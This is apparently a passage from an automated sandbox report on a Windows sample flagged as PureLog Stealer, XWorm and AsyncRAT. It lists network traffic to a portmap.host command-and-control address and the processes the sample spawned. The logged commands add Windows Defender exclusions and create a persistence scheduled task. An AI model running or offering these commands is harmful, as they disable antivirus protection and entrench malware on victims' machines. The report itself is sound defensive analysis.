Jul 18, 2024 08:37:17.532877922 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:17.537977934 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:17.548798084 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:17.553603888 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:17.642340899 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:17.647159100 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:17.932650089 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:17.935461998 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:17.940706015 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:17.940931082 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:17.949362993 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:17.949489117 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:17.954371929 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:18.080729961 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:18.082489967 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:18.087342978 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:30.001720905 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:30.007061958 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:30.250498056 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:30.252796888 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:30.258438110 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:33.989965916 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:34.032679081 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:34.611066103 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:34.616370916 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:34.813103914 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:34.821062088 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:34.825982094 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:36.611205101 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:36.616257906 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:36.868459940 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:36.870126963 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:36.875009060 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:37.899692059 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:37.906702995 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:38.102534056 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:38.103967905 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:38.108933926 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:38.111172915 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:38.117228985 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:38.611613035 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:38.613178968 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:38.618052006 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:38.954874039 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:38.959686041 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:39.155179024 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:39.156733036 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:39.161870003 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:43.314307928 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:43.320003033 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:43.345417023 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:43.350383043 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:43.361424923 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:43.366370916 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:43.439258099 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:43.444247961 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:43.470562935 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:43.475481987 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:43.533087969 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:43.534895897 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:43.539799929 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:43.564214945 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:43.569267035 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:43.637645960 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:43.639431953 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:43.644200087 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:43.741769075 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:43.743344069 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:43.748148918 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:43.748240948 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:43.753180027 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:43.886418104 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:43.887723923 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:43.892644882 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:44.279990911 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:44.282819033 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:44.287739992 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:47.079948902 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:47.084975004 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:47.312551022 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:47.315675020 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:47.324543953 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:53.064405918 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:53.069452047 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:53.375457048 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:53.380636930 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:53.385571957 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:53.833458900 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:53.838541031 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:54.034456015 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:54.036072016 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:54.041166067 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:55.285551071 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:55.290707111 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:55.546812057 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:55.548263073 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:55.553266048 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:56.611268044 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:56.617213964 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:56.828180075 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:56.830465078 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:56.835334063 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:58.345571041 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:58.350519896 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:58.570822954 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:58.573071957 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:58.577980042 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:00.161479950 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:00.166541100 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:00.357778072 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:00.359571934 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:00.365086079 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:03.974381924 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:04.017473936 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:09.111378908 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:09.116460085 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:09.364600897 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:09.366122007 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:09.371073008 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:14.517596006 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:14.522578955 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:14.580140114 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:14.585187912 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:14.611526966 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:14.616538048 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:14.674125910 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:14.679020882 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:14.932813883 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:14.936024904 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:14.941138029 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:15.094083071 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:15.097778082 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:15.102534056 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:15.103331089 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:15.108042002 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:15.923842907 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:15.930773020 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:16.206147909 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:16.209784985 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:16.214833021 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:18.736283064 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:18.741316080 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:19.057358980 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:19.059088945 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:19.065459967 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:23.126972914 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:23.131977081 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:23.327996016 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:23.341531992 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:23.346415997 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:23.876979113 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:23.881989002 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:24.133058071 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:24.138933897 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:24.143857956 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:25.096554041 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:25.101938009 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:25.305771112 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:25.310971022 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:25.315949917 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:29.470788002 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:29.475833893 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:29.679136038 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:29.680772066 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:29.685683012 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:30.345560074 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:30.350491047 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:30.392587900 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:30.397464991 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:30.408123970 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:30.412986040 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:30.423835039 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:30.428638935 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:30.455180883 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:30.460210085 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:30.517417908 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:30.522545099 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:30.564399958 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:30.569431067 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:30.580319881 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:30.585228920 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:30.626909018 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:30.632381916 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:31.085473061 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:31.087097883 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:31.092075109 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:31.228738070 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:31.230133057 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:31.235171080 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:31.235258102 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:31.240147114 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:31.240386963 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:31.245364904 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:34.209283113 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:34.251597881 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:39.316512108 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:39.326586962 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:39.516701937 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:39.521435022 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:39.527266026 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:40.830056906 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:40.834906101 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:40.892556906 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:40.897356033 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:41.153630018 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:41.155335903 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:41.162439108 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:41.302876949 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:41.309535980 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:41.316514969 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:48.017548084 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:48.022336960 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:48.213232040 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:48.217871904 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:48.222800970 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:51.423670053 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:51.428584099 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:51.665360928 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:51.667167902 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:51.672032118 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:53.581692934 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:53.586553097 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:53.779124022 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:53.783564091 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:53.788629055 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:56.564595938 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:56.570203066 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:56.642652035 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:56.647541046 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:56.689423084 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:56.694299936 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:56.705122948 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:56.709952116 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:56.720597982 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:56.725492001 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:56.849915028 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:56.851316929 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:56.856256962 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:56.995758057 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:56.996978998 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:57.001775026 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:38:57.001838923 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:38:57.007642984 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:39:00.736450911 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:39:00.741368055 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:39:01.017435074 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:39:01.021568060 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:39:01.022490978 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:39:01.022917032 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:39:01.027704000 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:39:01.233519077 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:39:01.235683918 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:39:01.241206884 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:39:01.801578045 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:39:01.806668043 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:39:02.012938023 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:39:02.019078016 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:39:02.024161100 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:39:03.973865986 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:39:04.017641068 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:39:12.642725945 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:39:12.648123026 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:39:13.060374022 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:39:13.061283112 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:39:13.066960096 CEST	30608	49708	193.161.193.99	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 18, 2024 08:35:15.852411985 CEST	58528	53	192.168.2.10	1.1.1.1
Jul 18, 2024 08:35:15.873003006 CEST	53	58528	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 18, 2024 08:35:15.852411985 CEST	192.168.2.10	1.1.1.1	0xe43a	Standard query (0)	moneymaker-30608.portmap.host	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 18, 2024 08:35:15.873003006 CEST	1.1.1.1	192.168.2.10	0xe43a	No error (0)	moneymaker-30608.portmap.host		193.161.193.99	A (IP address)	IN (0x0001)	false

Target ID:	1
Start time:	02:35:05
Start date:	18/07/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"
Imagebase:	0xbb0000
File size:	479'744 bytes
MD5 hash:	7FDA9F799B84A7ED802F7127869D5E81
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.1314250556.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.1308339600.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:35:08
Start date:	18/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"
Imagebase:	0xa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:35:08
Start date:	18/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:35:08
Start date:	18/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pNYyTm.exe"
Imagebase:	0xa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:35:08
Start date:	18/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:35:08
Start date:	18/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp"
Imagebase:	0x910000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:35:08
Start date:	18/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:35:09
Start date:	18/07/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"
Imagebase:	0x450000
File size:	479'744 bytes
MD5 hash:	7FDA9F799B84A7ED802F7127869D5E81
